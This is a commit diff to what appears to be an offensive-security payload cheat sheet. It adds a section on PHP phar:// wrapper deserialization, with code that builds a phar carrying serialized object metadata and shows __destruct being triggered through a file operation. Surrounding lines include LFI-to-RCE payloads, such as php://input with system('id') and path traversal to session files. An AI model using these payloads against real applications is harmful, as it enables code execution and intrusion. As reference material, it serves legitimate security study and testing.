Phar Wrapper - "unserialize"

File Inclusion - Path Traversal/README.md

@@ -12,6 +12,7 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
   * [Wrapper data://](#wrapper-data)
   * [Wrapper expect://](#wrapper-expect)
   * [Wrapper input://](#wrapper-input)
+  * [Wrapper phar://](#wrapper-phar)
 * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
 * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
 * [LFI to RCE via upload](#lfi-to-rce-via-upload)
@@ -185,6 +186,39 @@ http://example.com/index.php?page=php://input
 POST DATA: <? system('id'); ?>
 ```
 
+### Wrapper phar://
+
+Create a phar file with a serialized object in its meta-data.
+
+```php
+// create new Phar
+$phar = new Phar('test.phar');
+$phar->startBuffering();
+$phar->addFromString('test.txt', 'text');
+$phar->setStub('<?php __HALT_COMPILER(); ? >');
+
+// add object of any class as meta data
+class AnyClass {}
+$object = new AnyClass;
+$object->data = 'rips';
+$phar->setMetadata($object);
+$phar->stopBuffering();
+```
+
+If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked
+
+```php
+class AnyClass {
+    function __destruct() {
+        echo $this->data;
+    }
+}
+// output: rips
+include('phar://test.phar');
+```
+
+NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
+
 ## LFI to RCE via /proc/*/fd
 
 1. Upload a lot of shells (for example : 100)
@@ -266,4 +300,8 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
 * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
 * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
-* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
+* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
+* [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
+* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
+* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
+* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)

PHP serialization/README.md

@@ -2,6 +2,8 @@
 
 PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
 
+Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection.
+
 ## Exploit with the __wakeup in the unserialize function
 
 Vulnerable code: